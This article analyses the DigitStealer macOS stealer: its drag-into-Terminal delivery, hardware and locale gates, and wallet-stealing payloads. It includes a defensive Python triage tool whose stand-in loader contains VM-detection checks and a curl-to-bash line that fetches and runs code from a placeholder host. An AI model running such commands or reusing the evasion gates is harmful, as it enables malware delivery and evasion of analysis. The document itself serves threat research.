A new macOS information stealer, dubbed DigitStealer, combines a multi-stage loader with unusually strict environment checks to stay out of sight. It is delivered as a fake utility, splits its work across several payloads to keep any single artifact small, and relies on the user, rather than an exploit, to get past Apple's platform protections.
DigitStealer was found inside an unsigned disk image named DynamicLake.dmg that posed as a legitimate utility. Instead of a double-clickable app, the image carries a file labeled "Drag Into Terminal.msi" and instructs the user to drag it into Terminal, which runs its contents as a shell script. Launching code this way sidesteps the Gatekeeper prompt that an unsigned app opened from Finder would trigger, so the user never sees a warning. At the time of discovery no antivirus engine on VirusTotal flagged the file.
The most notable feature of DigitStealer is the set of hardware checks it runs before doing anything malicious, which stop it from executing on virtual machines or older Macs. According to Jamf security researchers, the malware only proceeds on newer Apple Silicon systems, those with an M2 chip or later, and deliberately exits on Intel-based Macs and on first-generation M1 devices. The primary payload is fetched only after this series of verifications passes.
The infection sequence begins with a one-line bash command that downloads an encoded script from a remote server. Once decoded, that script performs the verification steps, confirming it is running on a physical Mac with the expected hardware characteristics, before pulling anything further. Because researchers commonly analyze samples in virtual machines or on older hardware, a sandbox that fails these checks sees the script exit quietly and records nothing suspicious.
Detection Evasion Through Advanced Hardware Checks
DigitStealer distinguishes physical machines from analysis environments in two ways. First, it queries hardware information with system commands and scans the output for the keywords "Virtual" or "VM"; if either appears, it terminates immediately. Second, it checks for specific Apple Silicon CPU features.
For the feature check, the script reads the sysctl keys hw.optional.arm.FEAT_BTI, hw.optional.arm.FEAT_SSBS and hw.optional.arm.FEAT_ECV. These flags report whether the CPU implements the corresponding ARM extensions, which Apple first shipped in the M2 generation, so the M1 and all Intel Macs fail the test. The result is a stealer whose reach is limited to recent hardware, and which looks inert on the older or virtualized systems analysts most often use.
The script also checks the system locale and may exit if it detects certain countries. Such region gating is commonly used to avoid jurisdictions where the operators fear investigation or prosecution, and it complicates attribution. Together, the hardware and geographic filters show how carefully DigitStealer selects where it will run.
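For an analyst who has a decoded first-stage script in hand, the useful question is which of these gates it contains and whether the analysis host would even pass them. The following Python triage tool is an added example and not Jamf's tooling or any DigitStealer code. It does string matching only, never executing the script, over a constructed stand-in that mirrors the checks described above; the locale pattern and the download URL in the sample are placeholders, not real indicators.

```python
"""Static triage of a decoded first-stage loader for the anti-analysis gates
described in the text: VM keyword check, Apple Silicon feature flags, locale."""
import re
import subprocess
from dataclasses import dataclass, field
from typing import List, Optional

# sysctl keys the first stage queries; M1 and Intel Macs report 0 or lack them.
FEATURE_KEYS = (
    "hw.optional.arm.FEAT_BTI",
    "hw.optional.arm.FEAT_SSBS",
    "hw.optional.arm.FEAT_ECV",
)

# Constructed stand-in for a decoded first stage. It is NOT DigitStealer's
# loader; it mirrors the checks the article describes so the scanner has input.
# The locale glob (*_XX*) and the URL are placeholders, not real indicators.
SAMPLE_SCRIPT = """#!/bin/bash
HW=$(system_profiler SPHardwareDataType)
echo "$HW" | grep -qiE 'Virtual|VM' && exit 0
for k in hw.optional.arm.FEAT_BTI hw.optional.arm.FEAT_SSBS hw.optional.arm.FEAT_ECV; do
  [ "$(sysctl -n "$k" 2>/dev/null)" = "1" ] || exit 0
done
case "$(defaults read -g AppleLocale)" in *_XX*) exit 0 ;; esac
curl -fsSL https://example.invalid/stage2 | base64 -d | bash
"""


@dataclass
class TriageReport:
    feature_keys: List[str] = field(default_factory=list)  # FEATURE_KEYS seen in the script
    vm_keyword_check: bool = False                          # hardware output grepped for Virtual/VM
    locale_check: bool = False                              # reads the user or system locale
    remote_fetch: List[str] = field(default_factory=list)   # URLs pulled with curl/wget

    @property
    def verdict(self) -> str:
        gated = len(self.feature_keys) == len(FEATURE_KEYS) and self.vm_keyword_check
        if gated and self.remote_fetch:
            return "apple-silicon-gated multi-stage loader"
        if self.feature_keys or self.vm_keyword_check:
            return "anti-analysis checks present"
        return "no evasion indicators"


def triage_script(text: str) -> TriageReport:
    """Flag the evasion gates in a decoded shell script without running it."""
    report = TriageReport()
    report.feature_keys = [k for k in FEATURE_KEYS if k in text]
    hw_query = re.search(r"system_profiler\s+SPHardwareDataType", text)
    vm_words = re.search(r"\b(Virtual|VM)\b", text)
    report.vm_keyword_check = bool(hw_query and vm_words)
    report.locale_check = bool(
        re.search(r"AppleLocale|\bLC_ALL\b|\bLANG\b|\blocale\b", text)
    )
    # Capture the first URL on any curl/wget line: the next-stage download.
    report.remote_fetch = re.findall(r"\b(?:curl|wget)\b[^\n]*?(https?://\S+)", text)
    return report


def host_passes_feature_gate() -> Optional[bool]:
    """Ask this machine the same question the loader asks: are all three
    feature flags set? Returns None when sysctl lacks the keys (Intel Mac,
    most VMs, Linux), which is exactly the case the loader treats as 'exit'."""
    try:
        out = subprocess.run(
            ["sysctl", "-n", *FEATURE_KEYS], capture_output=True, text=True, check=False
        )
    except FileNotFoundError:
        return None
    values = out.stdout.split()
    if len(values) != len(FEATURE_KEYS):
        return None
    return all(v == "1" for v in values)


if __name__ == "__main__":
    r = triage_script(SAMPLE_SCRIPT)
    print(r.verdict, r.feature_keys, r.remote_fetch)
    print("this host would pass the feature gate:", host_passes_feature_gate())
```

Run it on a decoded first stage before detonating anything: if the report shows all three feature keys and host_passes_feature_gate() returns False or None, the sample will exit cleanly in that sandbox and a dynamic run will tell you nothing. Either move to a physical M2-or-later Mac or patch the gate out of the script before execution.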
Once every check passes, DigitStealer downloads four separate payloads from remote servers, each with a distinct job: stealing browser credentials, draining cryptocurrency wallets, and tampering with legitimate applications such as Ledger Live, a widely used wallet interface. Hosting these payloads on legitimate Cloudflare services lets the traffic blend in with ordinary web requests, which makes it harder for security products to block the downloads by reputation alone.
DigitStealer is a reminder that macOS needs the same defensive rigor as other platforms. Its hardware and locale gating means that sandboxes running on Intel, M1 or virtual hardware will not observe the malicious behaviour, so detection work has to account for that: analyzing samples on current physical Apple Silicon, watching for first-stage scripts that probe CPU feature flags and virtualization indicators before fetching further code, and sharing indicators between researchers and vendors. Defending against multi-stage stealers of this kind will remain a priority for macOS security teams.

